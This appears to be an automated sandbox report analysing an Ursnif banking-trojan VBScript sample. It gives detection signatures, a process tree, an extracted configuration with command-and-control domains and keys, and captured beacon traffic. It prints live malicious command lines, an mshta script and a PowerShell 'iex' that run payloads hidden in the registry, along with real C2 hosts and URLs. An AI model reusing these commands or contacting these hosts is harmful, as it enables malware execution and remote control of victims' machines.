Windows Analysis Report sample.vbs

Overview

General Information

Sample Name:sample.vbs
Analysis ID:481106
MD5:1dd89d4f6390f3dc46486ae6ee57bbf1
SHA1:1be7d12e55659bdd87c34eb24d7d4adf0b68a2c5
SHA256:801e42662653db4f680b49833f5ee0a48124aa814dd4178be1f948f4a8a68b07
Tags:vbs
Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3520 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 2152 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 3540 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 6704 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 5764 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • WmiPrvSE.exe (PID: 5388 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 2272 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 3860 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5104 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4936 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5424 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2424 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7052 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(11 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
18.3.rundll32.exe.527a4a0.1.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
18.3.rundll32.exe.527a4a0.1.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
18.3.rundll32.exe.5328d48.2.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
18.3.rundll32.exe.52f94a0.3.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5104
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5104
Sigma detected: Mshta Spawning Windows Shell
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5104
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5104, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline', ProcessId: 4936
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5104
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132757712350851215.5104.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5104

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000012.00000003.755921050.0000000000AE0000.00000040.00000001.sdmp; Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNW ; Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/ ; Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44eu ; Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d ; Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r ; Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW ; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com; Virustotal: Detection: 8%
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_00F23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdb; source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdbXP=a; source: powershell.exe, 00000016.00000002.885459267.00000200B1696000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb; source: wscript.exe, 00000000.00000003.540443568.000001C497429000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdb; source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdbXP=a; source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb; source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP; source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_05741577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_057314A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_05746E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_05751802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49818 -> 185.251.90.253:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49818 -> 185.251.90.253:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49819 -> 185.251.90.253:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49819 -> 185.251.90.253:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49820 -> 185.251.90.253:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49820 -> 185.251.90.253:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49821 -> 185.251.90.253:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49821 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 185.251.90.253 80
Source: Joe Sandbox View; ASN Name: SPRINTHOSTRU
Source: Joe Sandbox View; IP Address: 185.251.90.253
Source: global traffic; HTTP traffic detected:
  GET /LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
  Host: atl.bigbigpoppa.com
Source: global traffic; HTTP traffic detected:
  GET /yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
  Host: atl.bigbigpoppa.com
Source: global traffic; HTTP traffic detected:
  GET /HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
  Host: atl.bigbigpoppa.com
Source: global traffic; HTTP traffic detected:
  GET /M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
  Host: art.microsoftsofymicrosoftsoft.at
